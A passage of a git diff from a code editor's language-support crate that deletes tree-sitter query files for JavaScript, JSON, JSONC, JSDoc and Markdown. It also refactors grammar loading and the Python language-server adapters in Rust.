(string_fragment) @injection.content) - ]) - (#match? @_ecma_comment "^\\/\\*\\s*(gql|graphql)\\s*\\*\\/") - (#set! injection.language "graphql") -) - -; '/* css */' or '/*css*/' -( - ((comment) @_ecma_comment [ - (string (string_fragment) @injection.content) - (template_string (string_fragment) @injection.content) - ]) - (#match? @_ecma_comment "^\\/\\*\\s*(css)\\s*\\*\\/") - (#set! injection.language "css") -) diff --git a/crates/languages/src/javascript/outline.scm b/crates/languages/src/javascript/outline.scm deleted file mode 100644 index 5f72103bc63bdfab73f7b858c01abe8d34317b22..0000000000000000000000000000000000000000 --- a/crates/languages/src/javascript/outline.scm +++ /dev/null @@ -1,223 +0,0 @@ -(internal_module - "namespace" @context - name: (_) @name) @item - -(enum_declaration - "enum" @context - name: (_) @name) @item - -(function_declaration - "async"? @context - "function" @context - name: (_) @name - parameters: (formal_parameters - "(" @context - ")" @context)) @item - -(generator_function_declaration - "async"? @context - "function" @context - "*" @context - name: (_) @name - parameters: (formal_parameters - "(" @context - ")" @context)) @item - -(interface_declaration - "interface" @context - name: (_) @name) @item - -(program - (export_statement - (lexical_declaration - ["let" "const"] @context - (variable_declarator - name: (identifier) @name) @item))) - -; Exported array destructuring -(program - (export_statement - (lexical_declaration - ["let" "const"] @context - (variable_declarator - name: (array_pattern - [ - (identifier) @name @item - (assignment_pattern left: (identifier) @name @item) - (rest_pattern (identifier) @name @item) - ]))))) - -; Exported object destructuring -(program - (export_statement - (lexical_declaration - ["let" "const"] @context - (variable_declarator - name: (object_pattern - [(shorthand_property_identifier_pattern) @name @item - (pair_pattern - value: (identifier) @name @item) - (pair_pattern - value: (assignment_pattern left: (identifier) @name @item)) - (rest_pattern (identifier) @name @item)]))))) - -(program - (lexical_declaration - ["let" "const"] @context - (variable_declarator - name: (identifier) @name) @item)) - -; Top-level array destructuring -(program - (lexical_declaration - ["let" "const"] @context - (variable_declarator - name: (array_pattern - [ - (identifier) @name @item - (assignment_pattern left: (identifier) @name @item) - (rest_pattern (identifier) @name @item) - ])))) - -; Top-level object destructuring -(program - (lexical_declaration - ["let" "const"] @context - (variable_declarator - name: (object_pattern - [(shorthand_property_identifier_pattern) @name @item - (pair_pattern - value: (identifier) @name @item) - (pair_pattern - value: (assignment_pattern left: (identifier) @name @item)) - (rest_pattern (identifier) @name @item)])))) - -(class_declaration - "class" @context - name: (_) @name) @item - -; Method definitions in classes (not in object literals) -(class_body - (method_definition - [ - "get" - "set" - "async" - "*" - "readonly" - "static" - (override_modifier) - (accessibility_modifier) - ]* @context - name: (_) @name - parameters: (formal_parameters - "(" @context - ")" @context)) @item) - -; Object literal methods -(variable_declarator - value: (object - (method_definition - [ - "get" - "set" - "async" - "*" - ]* @context - name: (_) @name - parameters: (formal_parameters - "(" @context - ")" @context)) @item)) - -(public_field_definition - [ - "declare" - "readonly" - "abstract" - "static" - (accessibility_modifier) - ]* @context - name: (_) @name) @item - -; Add support for (node:test, bun:test and Jest) runnable -( - (call_expression - function: [ - (identifier) @_name - (member_expression - object: [ - (identifier) @_name - (member_expression object: (identifier) @_name) - ] - ) - ] @context - (#any-of? @_name "it" "test" "describe" "context" "suite") - arguments: ( - arguments . [ - (string (string_fragment) @name) - (identifier) @name - ] - ) - ) -) @item - -; Add support for parameterized tests -( - (call_expression - function: (call_expression - function: (member_expression - object: [(identifier) @_name (member_expression object: (identifier) @_name)] - property: (property_identifier) @_property - ) - (#any-of? @_name "it" "test" "describe" "context" "suite") - (#eq? @_property "each") - ) - arguments: ( - arguments . [ - (string (string_fragment) @name) - (identifier) @name - ] - ) - ) -) @item - -; Object properties -(pair - key: [ - (property_identifier) @name - (string (string_fragment) @name) - (number) @name - (computed_property_name) @name - ]) @item - -; Nested variables in function bodies -(statement_block - (lexical_declaration - ["let" "const"] @context - (variable_declarator - name: (identifier) @name) @item)) - -; Nested array destructuring in functions -(statement_block - (lexical_declaration - ["let" "const"] @context - (variable_declarator - name: (array_pattern - [ - (identifier) @name @item - (assignment_pattern left: (identifier) @name @item) - (rest_pattern (identifier) @name @item) - ])))) - -; Nested object destructuring in functions -(statement_block - (lexical_declaration - ["let" "const"] @context - (variable_declarator - name: (object_pattern - [(shorthand_property_identifier_pattern) @name @item - (pair_pattern value: (identifier) @name @item) - (pair_pattern value: (assignment_pattern left: (identifier) @name @item)) - (rest_pattern (identifier) @name @item)])))) - -(comment) @annotation diff --git a/crates/languages/src/javascript/runnables.scm b/crates/languages/src/javascript/runnables.scm deleted file mode 100644 index c64aacb50e286b1aeeb1231f2745d4d5923a7c1d..0000000000000000000000000000000000000000 --- a/crates/languages/src/javascript/runnables.scm +++ /dev/null @@ -1,46 +0,0 @@ -; Add support for (node:test, bun:test and Jest) runnable -; Function expression that has `it`, `test` or `describe` as the function name -( - (call_expression - function: [ - (identifier) @_name - (member_expression - object: [ - (identifier) @_name - (member_expression object: (identifier) @_name) - ] - ) - ] - (#any-of? @_name "it" "test" "describe" "context" "suite") - arguments: ( - arguments . [ - (string (string_fragment) @run) - (identifier) @run - ] - ) - ) @_js-test - - (#set! tag js-test) -) - -; Add support for parameterized tests -( - (call_expression - function: (call_expression - function: (member_expression - object: [(identifier) @_name (member_expression object: (identifier) @_name)] - property: (property_identifier) @_property - ) - (#any-of? @_name "it" "test" "describe" "context" "suite") - (#eq? @_property "each") - ) - arguments: ( - arguments . [ - (string (string_fragment) @run) - (identifier) @run - ] - ) - ) @_js-test - - (#set! tag js-test) -) diff --git a/crates/languages/src/javascript/textobjects.scm b/crates/languages/src/javascript/textobjects.scm deleted file mode 100644 index eace658e6b9847bcc651deedad2bc27cbfbf6975..0000000000000000000000000000000000000000 --- a/crates/languages/src/javascript/textobjects.scm +++ /dev/null @@ -1,85 +0,0 @@ -(comment)+ @comment.around - -(function_declaration - body: (_ - "{" - (_)* @function.inside - "}")) @function.around - -(method_definition - body: (_ - "{" - (_)* @function.inside - "}")) @function.around - -(function_expression - body: (_ - "{" - (_)* @function.inside - "}")) @function.around - -((arrow_function - body: (statement_block - "{" - (_)* @function.inside - "}")) @function.around - (#not-has-parent? @function.around variable_declarator)) - -; Arrow function in variable declaration - capture the full declaration -([ - (lexical_declaration - (variable_declarator - value: (arrow_function - body: (statement_block - "{" - (_)* @function.inside - "}")))) - (variable_declaration - (variable_declarator - value: (arrow_function - body: (statement_block - "{" - (_)* @function.inside - "}")))) -]) @function.around - -; Arrow function in variable declaration (captures body for expression-bodied arrows) -([ - (lexical_declaration - (variable_declarator - value: (arrow_function - body: (_) @function.inside))) - (variable_declaration - (variable_declarator - value: (arrow_function - body: (_) @function.inside))) -]) @function.around - -; Catch-all for arrow functions in other contexts (callbacks, etc.) -((arrow_function - body: (_) @function.inside) @function.around - (#not-has-parent? @function.around variable_declarator)) - -(generator_function - body: (_ - "{" - (_)* @function.inside - "}")) @function.around - -(generator_function_declaration - body: (_ - "{" - (_)* @function.inside - "}")) @function.around - -(class_declaration - body: (_ - "{" - [(_) ";"?]* @class.inside - "}" )) @class.around - -(class - body: (_ - "{" - [(_) ";"?]* @class.inside - "}" )) @class.around diff --git a/crates/languages/src/jsdoc/brackets.scm b/crates/languages/src/jsdoc/brackets.scm deleted file mode 100644 index 0e1bf5ca191bf7a319e2bcad6673d5cf0401380c..0000000000000000000000000000000000000000 --- a/crates/languages/src/jsdoc/brackets.scm +++ /dev/null @@ -1,2 +0,0 @@ -("[" @open "]" @close) -("{" @open "}" @close) diff --git a/crates/languages/src/json.rs b/crates/languages/src/json.rs index b6c3954cf228d90714a5eb5676d86a204b47b88d..de30d958d006016a118f2db077e38c1212f4f683 100644 --- a/crates/languages/src/json.rs +++ b/crates/languages/src/json.rs @@ -4,10 +4,10 @@ use async_tar::Archive; use async_trait::async_trait; use collections::HashMap; use futures::StreamExt; -use gpui::{App, AsyncApp, Task}; +use gpui::{App, AsyncApp, Entity, Task}; use http_client::github::{GitHubLspBinaryVersion, latest_github_release}; use language::{ - ContextProvider, LanguageName, LanguageRegistry, LocalFile as _, LspAdapter, + Buffer, ContextProvider, LanguageName, LanguageRegistry, LocalFile as _, LspAdapter, LspAdapterDelegate, LspInstaller, Toolchain, }; use lsp::{LanguageServerBinary, LanguageServerName, Uri}; @@ -44,10 +44,11 @@ pub(crate) struct JsonTaskProvider; impl ContextProvider for JsonTaskProvider { fn associated_tasks( &self, - file: Option>, + buffer: Option>, cx: &App, ) -> gpui::Task> { - let Some(file) = project::File::from_dyn(file.as_ref()).cloned() else { + let file = buffer.as_ref().and_then(|buf| buf.read(cx).file()); + let Some(file) = project::File::from_dyn(file).cloned() else { return Task::ready(None); }; let is_package_json = file.path.ends_with(RelPath::unix("package.json").unwrap()); @@ -245,6 +246,7 @@ impl LspAdapter for JsonLspAdapter { async fn initialization_options( self: Arc, _: &Arc, + _: &mut AsyncApp, ) -> Result> { Ok(Some(json!({ "provideFormatter": true diff --git a/crates/languages/src/json/brackets.scm b/crates/languages/src/json/brackets.scm deleted file mode 100644 index cd5cdf328b3a04730d56ec0cb06c3802fe07c978..0000000000000000000000000000000000000000 --- a/crates/languages/src/json/brackets.scm +++ /dev/null @@ -1,3 +0,0 @@ -("[" @open "]" @close) -("{" @open "}" @close) -(("\"" @open "\"" @close) (#set! rainbow.exclude)) diff --git a/crates/languages/src/json/indents.scm b/crates/languages/src/json/indents.scm deleted file mode 100644 index b7b2a2e7670f324730a64e15f1f59f37ac126270..0000000000000000000000000000000000000000 --- a/crates/languages/src/json/indents.scm +++ /dev/null @@ -1,2 +0,0 @@ -(array "]" @end) @indent -(object "}" @end) @indent diff --git a/crates/languages/src/json/outline.scm b/crates/languages/src/json/outline.scm deleted file mode 100644 index 43e2743478b27e4430bf3ddf82e49023d3bad584..0000000000000000000000000000000000000000 --- a/crates/languages/src/json/outline.scm +++ /dev/null @@ -1,2 +0,0 @@ -(pair - key: (string (string_content) @name)) @item diff --git a/crates/languages/src/json/redactions.scm b/crates/languages/src/json/redactions.scm deleted file mode 100644 index 7359637244ac5892c0d57b41e2ef11652a3d0890..0000000000000000000000000000000000000000 --- a/crates/languages/src/json/redactions.scm +++ /dev/null @@ -1,4 +0,0 @@ -(pair value: (number) @redact) -(pair value: (string) @redact) -(array (number) @redact) -(array (string) @redact) diff --git a/crates/languages/src/json/runnables.scm b/crates/languages/src/json/runnables.scm deleted file mode 100644 index 2396f05a5722f422f46fda8bb09e8b4e25bdb794..0000000000000000000000000000000000000000 --- a/crates/languages/src/json/runnables.scm +++ /dev/null @@ -1,21 +0,0 @@ -; Add support `package.json` and `composer.json` script runnable - -( - (document - (object - (pair - key: (string - (string_content) @_name - (#eq? @_name "scripts") - ) - value: (object - (pair - key: (string (string_content) @run @script) - ) - ) - ) - ) - ) - (#set! tag package-script) - (#set! tag composer-script) -) diff --git a/crates/languages/src/jsonc/brackets.scm b/crates/languages/src/jsonc/brackets.scm deleted file mode 100644 index cd5cdf328b3a04730d56ec0cb06c3802fe07c978..0000000000000000000000000000000000000000 --- a/crates/languages/src/jsonc/brackets.scm +++ /dev/null @@ -1,3 +0,0 @@ -("[" @open "]" @close) -("{" @open "}" @close) -(("\"" @open "\"" @close) (#set! rainbow.exclude)) diff --git a/crates/languages/src/jsonc/indents.scm b/crates/languages/src/jsonc/indents.scm deleted file mode 100644 index b7b2a2e7670f324730a64e15f1f59f37ac126270..0000000000000000000000000000000000000000 --- a/crates/languages/src/jsonc/indents.scm +++ /dev/null @@ -1,2 +0,0 @@ -(array "]" @end) @indent -(object "}" @end) @indent diff --git a/crates/languages/src/jsonc/injections.scm b/crates/languages/src/jsonc/injections.scm deleted file mode 100644 index 01e833d1e31d480b66a558bdfb8f07b2f0cdbc46..0000000000000000000000000000000000000000 --- a/crates/languages/src/jsonc/injections.scm +++ /dev/null @@ -1,2 +0,0 @@ -((comment) @injection.content - (#set! injection.language "comment")) diff --git a/crates/languages/src/jsonc/outline.scm b/crates/languages/src/jsonc/outline.scm deleted file mode 100644 index 43e2743478b27e4430bf3ddf82e49023d3bad584..0000000000000000000000000000000000000000 --- a/crates/languages/src/jsonc/outline.scm +++ /dev/null @@ -1,2 +0,0 @@ -(pair - key: (string (string_content) @name)) @item diff --git a/crates/languages/src/jsonc/redactions.scm b/crates/languages/src/jsonc/redactions.scm deleted file mode 100644 index 7359637244ac5892c0d57b41e2ef11652a3d0890..0000000000000000000000000000000000000000 --- a/crates/languages/src/jsonc/redactions.scm +++ /dev/null @@ -1,4 +0,0 @@ -(pair value: (number) @redact) -(pair value: (string) @redact) -(array (number) @redact) -(array (string) @redact) diff --git a/crates/languages/src/lib.rs b/crates/languages/src/lib.rs index c5e64aed639374655b0e60bde5dbd0b3da5468c3..9010bbde022e765b53ccceec042a075f85fc102b 100644 --- a/crates/languages/src/lib.rs +++ b/crates/languages/src/lib.rs @@ -1,14 +1,12 @@ -use anyhow::Context as _; use gpui::{App, SharedString, UpdateGlobal}; use node_runtime::NodeRuntime; use project::Fs; use python::PyprojectTomlManifestProvider; use rust::CargoManifestProvider; -use rust_embed::RustEmbed; use settings::{SemanticTokenRules, SettingsStore}; use smol::stream::StreamExt; -use std::{str, sync::Arc}; -use util::{ResultExt, asset_str}; +use std::sync::Arc; +use util::ResultExt; pub use language::*; @@ -35,11 +33,6 @@ mod yaml; pub(crate) use package_json::{PackageJson, PackageJsonData}; -#[derive(RustEmbed)] -#[folder = "src/"] -#[exclude = "*.rs"] -struct LanguageDir; - /// A shared grammar for plain text, exposed for reuse by downstream crates. #[cfg(feature = "tree-sitter-gitcommit")] pub static LANGUAGE_GIT_COMMIT: std::sync::LazyLock> = @@ -47,10 +40,11 @@ pub static LANGUAGE_GIT_COMMIT: std::sync::LazyLock> = Arc::new(Language::new( LanguageConfig { name: "Git Commit".into(), - soft_wrap: Some(language::language_settings::SoftWrap::EditorWidth), + soft_wrap: Some(language::SoftWrap::EditorWidth), matcher: LanguageMatcher { path_suffixes: vec!["COMMIT_EDITMSG".to_owned()], first_line_pattern: None, + ..LanguageMatcher::default() }, line_comments: vec![Arc::from("#")], ..LanguageConfig::default() @@ -61,32 +55,11 @@ pub static LANGUAGE_GIT_COMMIT: std::sync::LazyLock> = pub fn init(languages: Arc, fs: Arc, node: NodeRuntime, cx: &mut App) { #[cfg(feature = "load-grammars")] - languages.register_native_grammars([ - ("bash", tree_sitter_bash::LANGUAGE), - ("c", tree_sitter_c::LANGUAGE), - ("cpp", tree_sitter_cpp::LANGUAGE), - ("css", tree_sitter_css::LANGUAGE), - ("diff", tree_sitter_diff::LANGUAGE), - ("go", tree_sitter_go::LANGUAGE), - ("gomod", tree_sitter_go_mod::LANGUAGE), - ("gowork", tree_sitter_gowork::LANGUAGE), - ("jsdoc", tree_sitter_jsdoc::LANGUAGE), - ("json", tree_sitter_json::LANGUAGE), - ("jsonc", tree_sitter_json::LANGUAGE), - ("markdown", tree_sitter_md::LANGUAGE), - ("markdown-inline", tree_sitter_md::INLINE_LANGUAGE), - ("python", tree_sitter_python::LANGUAGE), - ("regex", tree_sitter_regex::LANGUAGE), - ("rust", tree_sitter_rust::LANGUAGE), - ("tsx", tree_sitter_typescript::LANGUAGE_TSX), - ("typescript", tree_sitter_typescript::LANGUAGE_TYPESCRIPT), - ("yaml", tree_sitter_yaml::LANGUAGE), - ("gitcommit", tree_sitter_gitcommit::LANGUAGE), - ]); + languages.register_native_grammars(grammars::native_grammars()); let c_lsp_adapter = Arc::new(c::CLspAdapter); let css_lsp_adapter = Arc::new(css::CssLspAdapter::new(node.clone())); - let eslint_adapter = Arc::new(eslint::EsLintLspAdapter::new(node.clone())); + let eslint_adapter = Arc::new(eslint::EsLintLspAdapter::new(node.clone(), fs.clone())); let go_context_provider = Arc::new(go::GoContextProvider); let go_lsp_adapter = Arc::new(go::GoLspAdapter); let json_context_provider = Arc::new(JsonTaskProvider); @@ -98,7 +71,7 @@ pub fn init(languages: Arc, fs: Arc, node: NodeRuntime let python_lsp_adapter = Arc::new(python::PyrightLspAdapter::new(node.clone())); let basedpyright_lsp_adapter = Arc::new(BasedPyrightLspAdapter::new(node.clone())); let ruff_lsp_adapter = Arc::new(RuffLspAdapter::new(fs.clone())); - let python_toolchain_provider = Arc::new(python::PythonToolchainProvider); + let python_toolchain_provider = Arc::new(python::PythonToolchainProvider::new(fs.clone())); let rust_context_provider = Arc::new(rust::RustContextProvider); let rust_lsp_adapter = Arc::new(rust::RustLspAdapter); let tailwind_adapter = Arc::new(tailwind::TailwindLspAdapter::new(node.clone())); @@ -125,6 +98,7 @@ pub fn init(languages: Arc, fs: Arc, node: NodeRuntime LanguageInfo { name: "cpp", adapters: vec![c_lsp_adapter], + semantic_token_rules: Some(cpp::semantic_token_rules()), ..Default::default() }, LanguageInfo { @@ -141,6 +115,7 @@ pub fn init(languages: Arc, fs: Arc, node: NodeRuntime name: "go", adapters: vec![go_lsp_adapter.clone()], context: Some(go_context_provider.clone()), + semantic_token_rules: Some(go::semantic_token_rules()), ..Default::default() }, LanguageInfo { @@ -179,11 +154,17 @@ pub fn init(languages: Arc, fs: Arc, node: NodeRuntime }, LanguageInfo { name: "python", - adapters: vec![basedpyright_lsp_adapter, ruff_lsp_adapter], + adapters: vec![ + basedpyright_lsp_adapter, + ruff_lsp_adapter, + ty_lsp_adapter, + py_lsp_adapter, + python_lsp_adapter, + ], context: Some(python_context_provider), toolchain: Some(python_toolchain_provider), manifest_name: Some(SharedString::new_static("pyproject.toml").into()), - ..Default::default() + semantic_token_rules: Some(python::semantic_token_rules()), }, LanguageInfo { name: "rust", @@ -281,9 +262,6 @@ pub fn init(languages: Arc, fs: Arc, node: NodeRuntime typescript_lsp_adapter, ); - languages.register_available_lsp_adapter(python_lsp_adapter.name(), python_lsp_adapter); - languages.register_available_lsp_adapter(py_lsp_adapter.name(), py_lsp_adapter); - languages.register_available_lsp_adapter(ty_lsp_adapter.name(), ty_lsp_adapter); // Register Tailwind for the existing languages that should have it by default. // // This can be driven by the `language_servers` setting once we have a way for @@ -293,7 +271,7 @@ pub fn init(languages: Arc, fs: Arc, node: NodeRuntime "CSS", "ERB", "HTML+ERB", - "HEEX", + "HEEx", "HTML", "JavaScript", "TypeScript", @@ -368,8 +346,8 @@ fn register_language( ) { let config = load_config(name); if let Some(rules) = &semantic_token_rules { - SettingsStore::update_global(cx, |store, _| { - store.set_language_semantic_token_rules(config.name.0.clone(), rules.clone()); + SettingsStore::update_global(cx, |store, cx| { + store.set_language_semantic_token_rules(config.name.0.clone(), rules.clone(), cx); }); } for adapter in adapters { @@ -384,7 +362,7 @@ fn register_language( Arc::new(move || { Ok(LoadedLanguage { config: config.clone(), - queries: load_queries(name), + queries: grammars::load_queries(name), context_provider: context.clone(), toolchain_provider: toolchain.clone(), manifest_name: manifest_name.clone(), @@ -396,56 +374,13 @@ fn register_language( #[cfg(any(test, feature = "test-support"))] pub fn language(name: &str, grammar: tree_sitter::Language) -> Arc { Arc::new( - Language::new(load_config(name), Some(grammar)) - .with_queries(load_queries(name)) + Language::new(grammars::load_config(name), Some(grammar)) + .with_queries(grammars::load_queries(name)) .unwrap(), ) } fn load_config(name: &str) -> LanguageConfig { - let config_toml = String::from_utf8( - LanguageDir::get(&format!("{}/config.toml", name)) - .unwrap_or_else(|| panic!("missing config for language {:?}", name)) - .data - .to_vec(), - ) - .unwrap(); - - #[allow(unused_mut)] - let mut config: LanguageConfig = ::toml::from_str(&config_toml) - .with_context(|| format!("failed to load config.toml for language {name:?}")) - .unwrap(); - - #[cfg(not(any(feature = "load-grammars", test)))] - { - config = LanguageConfig { - name: config.name, - matcher: config.matcher, - jsx_tag_auto_close: config.jsx_tag_auto_close, - ..Default::default() - } - } - - config -} - -fn load_queries(name: &str) -> LanguageQueries { - let mut result = LanguageQueries::default(); - for path in LanguageDir::iter() { - if let Some(remainder) = path.strip_prefix(name).and_then(|p| p.strip_prefix('/')) { - if !remainder.ends_with(".scm") { - continue; - } - for (name, query) in QUERY_FILENAME_PREFIXES { - if remainder.starts_with(name) { - let contents = asset_str::(path.as_ref()); - match query(&mut result) { - None => *query(&mut result) = Some(contents), - Some(r) => r.to_mut().push_str(contents.as_ref()), - } - } - } - } - } - result + let grammars_loaded = cfg!(any(feature = "load-grammars", test)); + grammars::load_config_for_feature(name, grammars_loaded) } diff --git a/crates/languages/src/markdown/brackets.scm b/crates/languages/src/markdown/brackets.scm deleted file mode 100644 index 172a2e7f723e3a170d80d19fa2f78fa334258105..0000000000000000000000000000000000000000 --- a/crates/languages/src/markdown/brackets.scm +++ /dev/null @@ -1,7 +0,0 @@ -("(" @open ")" @close) -("[" @open "]" @close) -("{" @open "}" @close) -(("\"" @open "\"" @close) (#set! rainbow.exclude)) -(("`" @open "`" @close) (#set! rainbow.exclude)) -(("'" @open "'" @close) (#set! rainbow.exclude)) -(((fenced_code_block_delimiter) @open (fenced_code_block_delimiter) @close) (#set! rainbow.exclude)) diff --git a/crates/languages/src/markdown/outline.scm b/crates/languages/src/markdown/outline.scm deleted file mode 100644 index dcca3db4d4cb920a7d9f939dc99197d139c3c2e6..0000000000000000000000000000000000000000 --- a/crates/languages/src/markdown/outline.scm +++ /dev/null @@ -1,3 +0,0 @@ -(section - (atx_heading - . (_) @context . (_) @name)) @item diff --git a/crates/languages/src/markdown/textobjects.scm b/crates/languages/src/markdown/textobjects.scm deleted file mode 100644 index e0f76c5365155687d6d53d38f222513b480a3aa7..0000000000000000000000000000000000000000 --- a/crates/languages/src/markdown/textobjects.scm +++ /dev/null @@ -1,3 +0,0 @@ -(section - (atx_heading) - (_)* @class.inside) @class.around diff --git a/crates/languages/src/python.rs b/crates/languages/src/python.rs index 9eaf9764f100428b4bbbc80238f7da5847001470..d27db372bf3d5f84ba282b30afd060f3ae4b183e 100644 --- a/crates/languages/src/python.rs +++ b/crates/languages/src/python.rs @@ -5,10 +5,12 @@ use collections::HashMap; use futures::future::BoxFuture; use futures::lock::OwnedMutexGuard; use futures::{AsyncBufReadExt, StreamExt as _}; -use gpui::{App, AsyncApp, SharedString, Task}; +use gpui::{App, AsyncApp, Entity, SharedString, Task}; use http_client::github::{AssetKind, GitHubLspBinaryVersion, latest_github_release}; -use language::language_settings::language_settings; -use language::{ContextLocation, DynLspInstaller, LanguageToolchainStore, LspInstaller, Symbol}; +use language::language_settings::LanguageSettings; +use language::{ + Buffer, ContextLocation, DynLspInstaller, LanguageToolchainStore, LspInstaller, Symbol, +}; use language::{ContextProvider, LspAdapter, LspAdapterDelegate}; use language::{LanguageName, ManifestName, ManifestProvider, ManifestQuery}; use language::{Toolchain, ToolchainList, ToolchainLister, ToolchainMetadata}; @@ -24,7 +26,7 @@ use project::lsp_store::language_server_settings; use semver::Version; use serde::{Deserialize, Serialize}; use serde_json::{Value, json}; -use settings::Settings; +use settings::{SemanticTokenRules, Settings}; use terminal::terminal_settings::TerminalSettings; use smol::lock::OnceCell; @@ -49,6 +51,14 @@ use std::{ use task::{ShellKind, TaskTemplate, TaskTemplates, VariableName}; use util::{ResultExt, maybe}; +pub(crate) fn semantic_token_rules() -> SemanticTokenRules { + let content = grammars::get_file("python/semantic_token_rules.json") + .expect("missing python/semantic_token_rules.json"); + let json = std::str::from_utf8(&content.data).expect("invalid utf-8 in semantic_token_rules"); + settings::parse_json_with_comments::(json) + .expect("failed to parse python semantic_token_rules.json") +} + #[derive(Debug, Serialize, Deserialize)] pub(crate) struct PythonToolchainData { #[serde(flatten)] @@ -159,6 +169,75 @@ fn process_pyright_completions(items: &mut [lsp::CompletionItem]) { } } +fn label_for_pyright_completion( + item: &lsp::CompletionItem, + language: &Arc, +) -> Option { + let label = &item.label; + let label_len = label.len(); + let grammar = language.grammar()?; + let highlight_id = match item.kind? { + lsp::CompletionItemKind::METHOD => grammar.highlight_id_for_name("function.method"), + lsp::CompletionItemKind::FUNCTION => grammar.highlight_id_for_name("function"), + lsp::CompletionItemKind::CLASS => grammar.highlight_id_for_name("type"), + lsp::CompletionItemKind::CONSTANT => grammar.highlight_id_for_name("constant"), + lsp::CompletionItemKind::VARIABLE => grammar.highlight_id_for_name("variable"), + _ => { + return None; + } + }; + let mut text = label.clone(); + if let Some(completion_details) = item + .label_details + .as_ref() + .and_then(|details| details.description.as_ref()) + { + write!(&mut text, " {}", completion_details).ok(); + } + Some(language::CodeLabel::filtered( + text, + label_len, + item.filter_text.as_deref(), + highlight_id + .map(|id| (0..label_len, id)) + .into_iter() + .collect(), + )) +} + +fn label_for_python_symbol( + symbol: &Symbol, + language: &Arc, +) -> Option { + let name = &symbol.name; + let (text, filter_range, display_range) = match symbol.kind { + lsp::SymbolKind::METHOD | lsp::SymbolKind::FUNCTION => { + let text = format!("def {}():\n", name); + let filter_range = 4..4 + name.len(); + let display_range = 0..filter_range.end; + (text, filter_range, display_range) + } + lsp::SymbolKind::CLASS => { + let text = format!("class {}:", name); + let filter_range = 6..6 + name.len(); + let display_range = 0..filter_range.end; + (text, filter_range, display_range) + } + lsp::SymbolKind::CONSTANT => { + let text = format!("{} = 0", name); + let filter_range = 0..name.len(); + let display_range = 0..filter_range.end; + (text, filter_range, display_range) + } + _ => return None, + }; + Some(language::CodeLabel::new( + text[display_range.clone()].to_string(), + filter_range, + language.highlight_text(&text.as_str().into(), display_range), + )) +} + pub struct TyLspAdapter { fs: Arc, } @@ -255,6 +334,14 @@ impl LspAdapter for TyLspAdapter { )) } + async fn label_for_symbol( + &self, + symbol: &language::Symbol, + language: &Arc, + ) -> Option { + label_for_python_symbol(symbol, language) + } + async fn workspace_configuration( self: Arc, delegate: &Arc, @@ -360,7 +447,7 @@ impl LspInstaller for TyLspAdapter { async_fs::create_dir_all(&destination_path).await?; let server_path = match Self::GITHUB_ASSET_KIND { - AssetKind::TarGz | AssetKind::Gz => destination_path + AssetKind::TarGz | AssetKind::TarBz2 | AssetKind::Gz => destination_path .join(Self::build_asset_name()?.0) .join("ty"), AssetKind::Zip => destination_path.clone().join("ty.exe"), @@ -450,7 +537,7 @@ impl LspInstaller for TyLspAdapter { let path = last.context("no cached binary")?; let path = match TyLspAdapter::GITHUB_ASSET_KIND { - AssetKind::TarGz | AssetKind::Gz => { + AssetKind::TarGz | AssetKind::TarBz2 | AssetKind::Gz => { path.join(Self::build_asset_name()?.0).join("ty") } AssetKind::Zip => path.join("ty.exe"), @@ -507,6 +594,7 @@ impl LspAdapter for PyrightLspAdapter { async fn initialization_options( self: Arc, _: &Arc, + _: &mut AsyncApp, ) -> Result> { // Provide minimal initialization options // Virtual environment configuration will be handled through workspace configuration @@ -530,36 +618,7 @@ impl LspAdapter for PyrightLspAdapter { item: &lsp::CompletionItem, language: &Arc, ) -> Option { - let label = &item.label; - let label_len = label.len(); - let grammar = language.grammar()?; - let highlight_id = match item.kind? { - lsp::CompletionItemKind::METHOD => grammar.highlight_id_for_name("function.method"), - lsp::CompletionItemKind::FUNCTION => grammar.highlight_id_for_name("function"), - lsp::CompletionItemKind::CLASS => grammar.highlight_id_for_name("type"), - lsp::CompletionItemKind::CONSTANT => grammar.highlight_id_for_name("constant"), - lsp::CompletionItemKind::VARIABLE => grammar.highlight_id_for_name("variable"), - _ => { - return None; - } - }; - let mut text = label.clone(); - if let Some(completion_details) = item - .label_details - .as_ref() - .and_then(|details| details.description.as_ref()) - { - write!(&mut text, " {}", completion_details).ok(); - } - Some(language::CodeLabel::filtered( - text, - label_len, - item.filter_text.as_deref(), - highlight_id - .map(|id| (0..label_len, id)) - .into_iter() - .collect(), - )) + label_for_pyright_completion(item, language) } async fn label_for_symbol( @@ -567,34 +626,7 @@ impl LspAdapter for PyrightLspAdapter { symbol: &language::Symbol, language: &Arc, ) -> Option { - let name = &symbol.name; - let (text, filter_range, display_range) = match symbol.kind { - lsp::SymbolKind::METHOD | lsp::SymbolKind::FUNCTION => { - let text = format!("def {}():\n", name); - let filter_range = 4..4 + name.len(); - let display_range = 0..filter_range.end; - (text, filter_range, display_range) - } - lsp::SymbolKind::CLASS => { - let text = format!("class {}:", name); - let filter_range = 6..6 + name.len(); - let display_range = 0..filter_range.end; - (text, filter_range, display_range) - } - lsp::SymbolKind::CONSTANT => { - let text = format!("{} = 0", name); - let filter_range = 0..name.len(); - let display_range = 0..filter_range.end; - (text, filter_range, display_range) - } - _ => return None, - }; - - Some(language::CodeLabel::new( - text[display_range.clone()].to_string(), - filter_range, - language.highlight_text(&text.as_str().into(), display_range), - )) + label_for_python_symbol(symbol, language) } async fn workspace_configuration( @@ -800,11 +832,10 @@ impl ContextProvider for PythonContextProvider { toolchains: Arc, cx: &mut gpui::App, ) -> Task> { - let test_target = - match selected_test_runner(location.file_location.buffer.read(cx).file(), cx) { - TestRunner::UNITTEST => self.build_unittest_target(variables), - TestRunner::PYTEST => self.build_pytest_target(variables), - }; + let test_target = match selected_test_runner(Some(&location.file_location.buffer), cx) { + TestRunner::UNITTEST => self.build_unittest_target(variables), + TestRunner::PYTEST => self.build_pytest_target(variables), + }; let module_target = self.build_module_target(variables); let location_file = location.file_location.buffer.read(cx).file().cloned(); @@ -842,10 +873,10 @@ impl ContextProvider for PythonContextProvider { fn associated_tasks( &self, - file: Option>, + buffer: Option>, cx: &App, ) -> Task> { - let test_runner = selected_test_runner(file.as_ref(), cx); + let test_runner = selected_test_runner(buffer.as_ref(), cx); let mut tasks = vec![ // Execute a selection @@ -952,9 +983,11 @@ impl ContextProvider for PythonContextProvider { } } -fn selected_test_runner(location: Option<&Arc>, cx: &App) -> TestRunner { +fn selected_test_runner(location: Option<&Entity>, cx: &App) -> TestRunner { const TEST_RUNNER_VARIABLE: &str = "TEST_RUNNER"; - language_settings(Some(LanguageName::new_static("Python")), location, cx) + let language = LanguageName::new_static("Python"); + let settings = LanguageSettings::resolve(location.map(|b| b.read(cx)), Some(&language), cx); + settings .tasks .variables .get(TEST_RUNNER_VARIABLE) 